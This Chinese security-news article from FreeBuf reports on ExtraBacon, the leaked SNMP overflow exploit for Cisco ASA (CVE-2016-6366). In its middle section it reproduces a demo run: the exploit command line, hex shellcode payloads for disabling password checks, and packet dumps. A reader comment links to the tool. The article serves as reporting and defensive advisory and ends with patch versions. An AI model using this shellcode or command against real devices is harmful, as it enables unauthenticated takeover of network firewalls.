最近我们一直在说NSA方程式组织被黑事件很大条,这个入侵NSA的神秘组织The Shadow Brokers到现在都还没有揭开神秘面纱。实际上,NSA被黑事件之所以如此引人关注,很大部分原因是,The Shadow Brokers公布的、原属于方程式组织的工具,实在是令人叹为观止。
比如其中一款名为BenignCertain的工具,是专门针对思科的PIX防火墙家族产品。安全研究人员在测试后发现,这款工具可用来解密VPN流量(方法是发送包至目标设备,转储内存中包含VPN认证密码的部分)。虽然思科PIX系列产品早在2009年就停产了,但许多政府部门、企业单位还在使用,影响PIX version 6.x以及之前的所有版本。欲了解详情,请点击这里。
也就是说,如果企业选择思科PIX产品,NSA是可以进行VPN流量的长期监听的。所以思科方面表示,虽然PIX已经不受支持了,但我们还是很负责任地进行了调查,问题真的存在哦!所以请亲们选择我们的最新产品哦!(Lol)
不过这里要说的是The Shadow Brokers公布的另外一款漏洞利用工具ExtraBacon(额外的烤肉?)——此工具影响到的是思科Adaptive Security Appliance(ASA)产品(ASA实际涵盖了防火墙和路由器设备,PIX也在其列)。我们先前已经有文章简单带到过ExtraBacon,提到该工具仅对8.4.(4)及更早版本的ASA软件有效。
然而最近安全咨询公司SilentSignal简单修改了ExtraBacon的代码,并且表示,这货已经有能力影响更新版本的ASA软件了,其漏洞利用能力扩展至9.2.(4)版本。
ExtraBacon的威力有多大
方程式最擅长的就是发现0-day漏洞,然后构造出一流的工具来利用这些漏洞发起攻击。ExtraBacon在遭到曝光之后,思科也立刻承认了ASA产品中的确存在相应漏洞,漏洞编号CVE-2016-6366。
这是思科ASA软件SNMP(简单网络管理协议)协议代码中的一个漏洞,可致未经授权的远程攻击者,对受影响的系统发起远程执行代码攻击。这个漏洞的本质也是由于相应代码部分的缓冲区溢出。具体说来,攻击者可以向系统发出伪造的SNMP包,执行任意代码,并且获得系统的完整控制权。
安全研究人员XORcat写了个Demo文章(里面有The Shadow Brokers公布的文件哦!)。其中提到,一旦漏洞利用成功,攻击者就可在无需输入身份凭证的情况下建立起SSH或telnet连接。就是不需要输入有效用户名或密码,就能闯进ASA。想知道ExtraBacon长啥样么?
首先来看看ExtraBacon的帮助菜单:
omar@omar-io:~$ ./extrabacon_1.1.0.1.py -h
Logging to /home/omar/concernedparent
usage: extrabacon_1.1.0.1.py [-h] [-v] [-q] {info,exec} ...
Extrabacon (version 1.1.0.1)
positional arguments:
{info,exec}
optional arguments:
-h, --help show this help message and exit
-v, --verbose verbose logging, add more -v for more verbose logging
-q, --quiet minimize logging (not recommended)
针对管理接口发动exploit(192.168.1.66),ASA配置SNMPv2,community string为“cisco”,那么就会得到下面这串信息:
omar@omar-io:~$ ./extrabacon_1.1.0.1.py exec -k F_RlDw -v -t 192.168.1.66 -c cisco --mode pass-enable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/omar/concernedparent
[+] Executing: ./extrabacon_1.1.0.1.py exec -k F_RlDw -v -t 192.168.1.66 -c cisco --mode pass-enable
[+] running from /home/omar
Data stored in self.vinfo: ASA803
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa803
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bf7082090931c9b104fcf3a4e92f0000005e
ebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525acac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfb060060831c9b104fcf3a4e92f0000005eebece8f8ffffff5
589e557bfa5a5a5a5b8d8a5a5a531f8bba5c5a3ad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425297185
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165.165.165.165.131.236.
4.137.4.36.137.229.131.197.88.4
*** output omitted ****
44.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bf7082090931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531
f8bba525acac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfb060060831c9b104fcf3a4e92f0000005eebece8f8fff
fff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5c5a3ad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (371): 3082016f0201010405636973636fa58201610204195985210201000201013082015130819106072b0601020101010
*** output omitted ****
0811081108110811081108110811081108110810d7b810309810b7c2414810b07817f816081100500
[+] Connecting to 192.168.1.66:161
[+] packet 1 of 1
[+] 0000 30 82 01 6F 02 01 01 04 05 63 69 73 63 6F A5 82 0..o.....cisco..
[+] 0010 01 61 02 04 19 59 85 21 02 01 00 02 01 01 30 82 .a...Y.!......0.
[+] 0020 01 51 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .Q0....+........
[+] 0030 85 EB 14 BF 70 82 09 09 31 C9 B1 04 FC F3 A4 E9 ....p...1.......
[+] 0040 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 31 C0 89 /...^.......U1..
[+] 0050 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 AC ..........1...%.
[+] 0060 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 A5 31 .1......1......1
[+] 0070 FA CD 80 EB 14 BF B0 60 06 08 31 C9 B1 04 FC F3 .......`..1.....
[+] 0080 A4 E9 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 89 ../...^.......U.
...
不过Context Industrial Security公司的工程师Michael Toecker对ExtraBacon进行了分析,发现这款工具其实是专为早期版本的ASA设计的(低于8.4(4)版),如上图所示,先检查软件版本,再下手。这或许成为ExtraBacon应用的限制短板,因为这些版本太早——但这也不奇怪,我们先前就在报道文章中提到,The Shadow Brokers泄露的这波文件至少都是3年之前的了,所以算是颇有历史。
稍加改造就能应用到新版本中
实际上,思科方面在得知自家产品存在这个漏洞之后就很快发布了安全公告(这两天思科安全和公关团队应该好忙好忙…),本周末还发布了补丁。其实我们看媒体将ExtraBacon,还有前文提到的BenignCertain,渲染得如此恐怖,实际情况是ExtraBacon的利用还是有一定条件的。
比如说,首先相应接口需要设置为接收SNMP包(在上面的例子中,就是管理接口),其次攻击者还需要知道SNMP的community string——简单说,这是个起到密码作用的字符串,用来鉴别SNMP信息发送;另外在路由和透明防火墙模式下才会受影响。加上对版本的要求,这些限制条件还是比较严苛的。
不过SilentSignal对ExtraBacon稍加改造之后,宣称ExtraBacon完全可以应用到新版ASA中,这让ExtraBacon的威胁程度又更进一步,虽然其实讲这话也没什么意思——因为ExtraBacon本身应该已经是方程式组织在用的早期工具了,不过这对不少黑客而言或许也是个好消息。
SilentSignal在Twitter上发布了演示成功的截图,表明ExtraBacon的影响力足以扩展至9.2.(4)版本的ASA软件。他们的研究人员在接受ArsTechnica采访时表示:
“我们首先针对该利用工具做研究,主要是想看看让它支持更新版本的ASA是否有难度,结果发现非常容易。这说明两件事:
第一,泄露的代码并不像某些人认为得那么差;
第二,缺乏针对思科软件的缓解技术,为攻击者提供了更多便利。”
另外Toecker认为,其实思科应该不会对这件事感到意外。上周思科的首席工程师Omar Santos就在文章谈到,ExtraBacon会在9.4(1)版本的ASA中停止工作。Tocker认为,一般停止工作可能就表明其中只是存在BUG,只要稍作合理修改,攻击者就可以再度利用。
总得说来,综合上面谈到ExtraBacon的各种利用条件,加上对针对新版本支持的修改,这款工具的使用对脚本小子来说恐怕门槛有点过高了,ExtraBacon理应也只是针对思科产品攻击的其中一环。
本周末的最新消息,思科已经针对ASA软件推出最新补丁了,专门针对ExtraBacon。提醒还在用CISCO ASA 7.2、8.0、8.1、8.2、8.3、8.4、8.5、8.6、8.7的网络管理员,尽早升级至9.1.7(9)或更新版本。针对ASA 9.1、9.5、9.6都进行了漏洞修复,修复后的软件版本号分别为9.1.7(9)、9.5(3)、9.6.1(11)。
* FreeBuf官方报道,作者/欧阳洋葱,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)
关注我们 分享每日精选文章
不容错过
- CVE-2016-5696漏洞分析:TCP侧信道安全Leon不会玩QEMU2016-08-19
- 半开源Web安全测试与学习平台 – 蚁逅69氏2015-03-19
- 2015年夏季国内外重磅黑客峰会参会指南明明知道2015-06-18
- 【重磅】FreeBuf发布2017金融行业应用安全态势报告FreeBuf研究院2017-03-20
Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
0daybank
已有 5 条评论
咋没有工具链接呢?
思科该多加小心其余漏洞
工具在哪里?
https://github.com/blahdidbert/extrabacon
[doge][doge][doge]围观